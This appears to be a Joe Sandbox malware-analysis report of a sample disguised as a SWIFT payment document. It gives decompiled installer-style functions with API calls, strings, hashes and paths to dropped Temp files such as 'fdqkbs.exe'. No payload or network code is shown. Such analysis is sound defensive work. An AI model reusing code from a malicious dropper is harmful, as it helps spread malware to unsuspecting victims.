Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
Instruction ID: e2f9fea5dfd6f059ba8eeb08e8d10ac227d01a2162b8a260283931f50cd0bfbf
Opcode Fuzzy Hash: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
Instruction Fuzzy Hash: 33418B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0C7349A55DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 004066A5 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 196
stringCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E004066A5(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
				struct _ITEMIDLIST* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t44;
				WCHAR* _t45;
				signed char _t47;
				signed int _t48;
				short _t59;
				short _t61;
				short _t63;
				void* _t71;
				signed int _t77;
				signed int _t78;
				short _t81;
				short _t82;
				signed char _t84;
				signed int _t85;
				void* _t98;
				void* _t104;
				intOrPtr* _t105;
				void* _t107;
				WCHAR* _t108;
				void* _t110;

				_t107 = __esi;
				_t104 = __edi;
				_t71 = __ebx;
				_t44 = _a8;
				if(_t44 < 0) {
					_t44 =  *( *0x42923c - 4 + _t44 * 4);
				}
				_push(_t71);
				_push(_t107);
				_push(_t104);
				_t105 =  *0x42a298 + _t44 * 2;
				_t45 = 0x428200;
				_t108 = 0x428200;
				if(_a4 >= 0x428200 && _a4 - 0x428200 >> 1 < 0x800) {
					_t108 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				_t81 =  *_t105;
				_a8 = _t81;
				if(_t81 == 0) {
					L43:
					 *_t108 =  *_t108 & 0x00000000;
					if(_a4 == 0) {
						return _t45;
					}
					return E00406668(_a4, _t45);
				} else {
					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
						_t98 = 2;
						_t105 = _t105 + _t98;
						if(_t81 >= 4) {
							if(__eflags != 0) {
								 *_t108 = _t81;
								_t108 = _t108 + _t98;
								__eflags = _t108;
							} else {
								 *_t108 =  *_t105;
								_t108 = _t108 + _t98;
								_t105 = _t105 + _t98;
							}
							L42:
							_t82 =  *_t105;
							_a8 = _t82;
							if(_t82 != 0) {
								_t81 = _a8;
								continue;
							}
							goto L43;
						}
						_t84 =  *((intOrPtr*)(_t105 + 1));
						_t47 =  *_t105;
						_t48 = _t47 & 0x000000ff;
						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
						_t85 = _t84 & 0x000000ff;
						_v28 = _t48 | 0x00008000;
						_t77 = 2;
						_v16 = _t85;
						_t105 = _t105 + _t77;
						_v24 = _t48;
						_v20 = _t85 | 0x00008000;
						if(_a8 != _t77) {
							__eflags = _a8 - 3;
							if(_a8 != 3) {
								__eflags = _a8 - 1;
								if(__eflags == 0) {
									__eflags = (_t48 | 0xffffffff) - _v12;
									E004066A5(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
								}
								L38:
								_t108 =  &(_t108[lstrlenW(_t108)]);
								_t45 = 0x428200;
								goto L42;
							}
							_t78 = _v12;
							__eflags = _t78 - 0x1d;
							if(_t78 != 0x1d) {
								__eflags = (_t78 << 0xb) + 0x42b000;
								E00406668(_t108, (_t78 << 0xb) + 0x42b000);
							} else {
								E004065AF(_t108,  *0x42a268);
							}
							__eflags = _t78 + 0xffffffeb - 7;
							if(__eflags < 0) {
								L29:
								E004068EF(_t108);
							}
							goto L38;
						}
						if( *0x42a2e4 != 0) {
							_t77 = 4;
						}
						_t121 = _t48;
						if(_t48 >= 0) {
							__eflags = _t48 - 0x25;
							if(_t48 != 0x25) {
								__eflags = _t48 - 0x24;
								if(_t48 == 0x24) {
									GetWindowsDirectoryW(_t108, 0x400);
									_t77 = 0;
								}
								while(1) {
									__eflags = _t77;
									if(_t77 == 0) {
										goto L26;
									}
									_t59 =  *0x42a264;
									_t77 = _t77 - 1;
									__eflags = _t59;
									if(_t59 == 0) {
										L22:
										_t61 = SHGetSpecialFolderLocation( *0x42a268,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
										__eflags = _t61;
										if(_t61 != 0) {
											L24:
											 *_t108 =  *_t108 & 0x00000000;
											__eflags =  *_t108;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v8, _t108);
										_a8 = _t61;
										__imp__CoTaskMemFree(_v8);
										__eflags = _a8;
										if(_a8 != 0) {
											goto L26;
										}
										goto L24;
									}
									_t63 =  *_t59( *0x42a268,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
									__eflags = _t63;
									if(_t63 == 0) {
										goto L26;
									}
									goto L22;
								}
								goto L26;
							}
							GetSystemDirectoryW(_t108, 0x400);
							goto L26;
						} else {
							E00406536( *0x42a298, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a298 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
							if( *_t108 != 0) {
								L27:
								if(_v16 == 0x1a) {
									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L29;
							}
							E004066A5(_t77, _t105, _t108, _t108, _v16);
							L26:
							if( *_t108 == 0) {
								goto L29;
							}
							goto L27;
						}
					}
					goto L43;
				}
			}

0x004066a5
0x004066a5
0x004066a5
0x004066ab
0x004066b0
0x004066c1
0x004066c1
0x004066c9
0x004066ca
0x004066cb
0x004066cc
0x004066cf
0x004066d7
0x004066d9
0x004066ea
0x004066ed
0x004066ed
0x004066f1
0x004066f7
0x004066fa
0x004068d5
0x004068d5
0x004068e0
0x004068ec
0x004068ec
0x00000000
0x00406700
0x00406705
0x0040671a
0x0040671b
0x00406721
0x004068b3
0x004068c1
0x004068c4
0x004068c4
0x004068b5
0x004068b8
0x004068bb
0x004068bd
0x004068bd
0x004068c6
0x004068c6
0x004068cc
0x004068cf
0x00406702
0x00000000
0x00406702
0x00000000
0x004068cf
0x00406727
0x0040672a
0x00406739
0x00406740
0x0040674c
0x0040674f
0x00406752
0x00406753
0x00406758
0x0040675e
0x00406761
0x00406764
0x00406857
0x0040685c
0x0040688f
0x00406894
0x00406899
0x0040689e
0x0040689e
0x004068a3
0x004068a9
0x004068ac
0x00000000
0x004068ac
0x0040685e
0x00406861
0x00406864
0x00406879
0x00406880
0x00406866
0x0040686d
0x0040686d
0x00406888
0x0040688b
0x0040684f
0x00406850
0x00406850
0x00000000
0x0040688b
0x00406771
0x00406775
0x00406775
0x00406776
0x00406778
0x004067b5
0x004067b8
0x004067c8
0x004067cb
0x004067d3
0x004067d9
0x004067d9
0x00406834
0x00406834
0x00406836
0x00000000
0x00000000
0x004067dd
0x004067e2
0x004067e3
0x004067e5
0x004067fc
0x0040680a
0x00406810
0x00406812
0x00406830
0x00406830
0x00406830
0x00000000
0x00406830
0x00406818
0x00406821
0x00406824
0x0040682a
0x0040682e
0x00000000
0x00000000
0x00000000
0x0040682e
0x004067f6
0x004067f8
0x004067fa
0x00000000
0x00000000
0x00000000
0x004067fa
0x00000000
0x00406834
0x004067c0
0x00000000
0x0040677a
0x00406798
0x004067a1
0x0040683e
0x00406842
0x0040684a
0x0040684a
0x00000000
0x00406842
0x004067ab
0x00406838
0x0040683c
0x00000000
0x00000000
0x00000000
0x0040683c
0x00406778
0x00000000
0x00406705

APIs

GetSystemDirectoryW.KERNEL32("C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v,00000400), ref: 004067C0
GetWindowsDirectoryW.KERNEL32("C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v,00000400,00000000,00422728,?,00405701,00422728,00000000,00000000,00000000,00000000), ref: 004067D3
lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 0040678E
"C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v, xrefs: 004066CF, 00406782, 00406789, 0040678D, 004067AA, 004067BF, 004067D2, 004067E7, 00406814, 00406849, 0040684F, 0040686C, 0040687F, 0040689D, 004068A3, 004068AC, 004068E2
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406844

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID: Directory$SystemWindowslstrcatlstrlen
String ID: "C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 4260037668-746024
Opcode ID: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
Instruction ID: 414c90a3e727c3679fd522760d05a71ccfd37451a898d0680c6fb4b4ce958948
Opcode Fuzzy Hash: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
Instruction Fuzzy Hash: CD61E172A02115EBDB20AF64CD40BAA37A5EF10314F22C13EE946B62D0DB3D49A1CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 004056CA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004056CA(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x429244;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x42a314;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E004066A5(_t38, 0, 0x422728, 0x422728, _a4);
					}
					_t27 = lstrlenW(0x422728);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x429228, 0x422728);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x422728;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x422728[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x422728, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

0x004056d0
0x004056da
0x004056df
0x004056e5
0x004056f0
0x004056f3
0x004056f6
0x004056fc
0x004056fc
0x00405702
0x0040570a
0x0040570d
0x0040572a
0x0040572e
0x00405737
0x00405737
0x00405741
0x0040574a
0x00405756
0x0040575d
0x00405761
0x00405764
0x00405777
0x00405785
0x00405785
0x00405789
0x0040578b
0x0040578e
0x00000000
0x0040578e
0x0040570f
0x00405717
0x0040571f
0x00405725
0x00000000
0x00405725
0x0040571f
0x0040570d
0x0040579a

APIs

lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
SetWindowTextW.USER32(00422728,00422728), ref: 00405737
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785

Part of subcall function 004066A5: lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
Part of subcall function 004066A5: lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4

Strings

('B, xrefs: 004056EB

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$TextWindow
String ID: ('B
API String ID: 1495540970-2332581011
Opcode ID: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
Instruction ID: 7f52a71d89202be05388d2ae90ba5930d13dcc1e6093ad3ff4eaa481a322a782
Opcode Fuzzy Hash: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
Instruction Fuzzy Hash: C6217A71900518FACB119FA5DD84A8EBFB8EB45360F10857AF904B62A0D67A4A509F68

Uniqueness

Uniqueness Score: -1.00%

Function 0040462B Relevance: 12.1, APIs: 8, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040462B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}

0x0040463d
0x004046f3
0x00000000
0x004046f3
0x0040464e
0x00404652
0x00000000
0x0040466c
0x0040466c
0x00404675
0x00000000
0x00000000
0x00404677
0x00404683
0x00404686
0x00404686
0x0040468c
0x00404692
0x00404692
0x0040469e
0x004046a4
0x004046ab
0x004046ae
0x004046b1
0x004046b3
0x004046b3
0x004046bb
0x004046c1
0x004046c1
0x004046cb
0x004046d0
0x004046d3
0x004046d8
0x004046db
0x004046db
0x004046eb
0x004046eb
0x00000000
0x004046ee

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00404648
GetSysColor.USER32(00000000), ref: 00404686
SetTextColor.GDI32(?,00000000), ref: 00404692
SetBkMode.GDI32(?,?), ref: 0040469E
GetSysColor.USER32(?), ref: 004046B1
SetBkColor.GDI32(?,?), ref: 004046C1
DeleteObject.GDI32(?), ref: 004046DB
CreateBrushIndirect.GDI32(?), ref: 004046E5

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction ID: e78b8cc9c8042372c9a7340b9b8aa9b23ded286a9f8ddc7240a2e2d8bd1f46c0
Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction Fuzzy Hash: DE2197715007049FC7309F28D908B5BBBF8AF42714F008D2EE992A22E1D739D944DB58

Uniqueness

Uniqueness Score: -1.00%

Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
				_t66 = E00402D84(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x42a2e8 =  *0x42a2e8 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x44) = 0x3ff;
					}
					if( *__edi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x38) = __ebx;
						 *(__ebp - 0x18) = E004065C8(__ecx, __edi);
						if( *(__ebp - 0x44) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E00406239( *(__ebp - 0x18), __ebx) >= 0) {
										__eax = __ebp - 0x50;
										if(E004061DB( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x4c) = __ecx;
											 *(__ebp - 0x50) = __eax;
											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E004065AF( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x50 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x50);
												} else {
													__edi =  *(__ebp - 0x4c);
													__edi =  ~( *(__ebp - 0x4c));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x50) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
														__edi = __edi + 1;
														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
														__eax = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x38) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}

0x004026ec
0x004026ee
0x004026f1
0x004026f3
0x004026f6
0x004026fb
0x004026ff
0x00402702
0x00402705
0x00402c2a
0x00402c2d
0x0040270b
0x0040270b
0x00402712
0x00402714
0x00402714
0x0040271a
0x0040287e
0x0040287e
0x00402881
0x00402886
0x004015b6
0x0040292e
0x0040292e
0x00000000
0x00402720
0x00402721
0x0040272c
0x0040272f
0x0040273b
0x0040273f
0x004027d7
0x004027ef
0x004027ff
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00402745
0x00402745
0x00402748
0x00402749
0x0040274c
0x00402751
0x00402758
0x00402760
0x00000000
0x00402766
0x00402766
0x0040276b
0x00000000
0x00402771
0x00402771
0x00402779
0x0040277c
0x0040277f
0x0040283a
0x00402841
0x00402785
0x0040278b
0x00402797
0x00402801
0x00402801
0x00402799
0x00402799
0x0040279c
0x0040279e
0x0040279e
0x0040279e
0x004027a1
0x004027a6
0x004027a9
0x00000000
0x00000000
0x004027ab
0x004027ae
0x004027bc
0x004027c2
0x004027d0
0x00000000
0x004027d2
0x00000000
0x004027d2
0x00000000
0x004027d0
0x0040279e
0x00402804
0x00402807
0x00000000
0x00402809
0x0040280e
0x0040284f
0x00402871
0x00402878
0x0040285d
0x0040285d
0x00402860
0x00402863
0x00402866
0x00402866
0x00000000
0x00402817
0x00402817
0x0040281a
0x0040281d
0x00402823
0x00402827
0x0040282a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040282a
0x0040280e
0x00402807
0x0040277f
0x0040276b
0x00402760
0x00000000
0x0040282c
0x0040282c
0x0040282f
0x00402838
0x00000000
0x0040272f
0x0040271a
0x00402c33
0x00402c39

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 00402758
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC

Part of subcall function 00406239: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040624F

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878

Strings

9, xrefs: 0040273B

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
Instruction ID: 581cf2785626502de532f206a1de9da9d9b8d20bcd24121b7f7bd1133decb9a2
Opcode Fuzzy Hash: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
Instruction Fuzzy Hash: CE51FB75D00219AADF20EF95CA88AAEBB75FF04304F50417BE541B62D4D7B49D82CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004068EF Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E004068EF(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405FAE(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405F64(L"*?|<>/\":", _t5))) == 0) {
							E00406113(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x004068f1
0x004068fa
0x00406911
0x00406911
0x00406918
0x00406924
0x00406924
0x00406927
0x0040692a
0x0040692f
0x00406931
0x0040693a
0x0040693e
0x0040695b
0x00406963
0x00406963
0x00406968
0x0040696a
0x0040696d
0x00406972
0x00406973
0x00406977
0x00406977
0x00406978
0x0040697f
0x00406981
0x00406988
0x00000000
0x00000000
0x00406990
0x00406996
0x00000000
0x00000000
0x00000000
0x00406996
0x0040699b

APIs

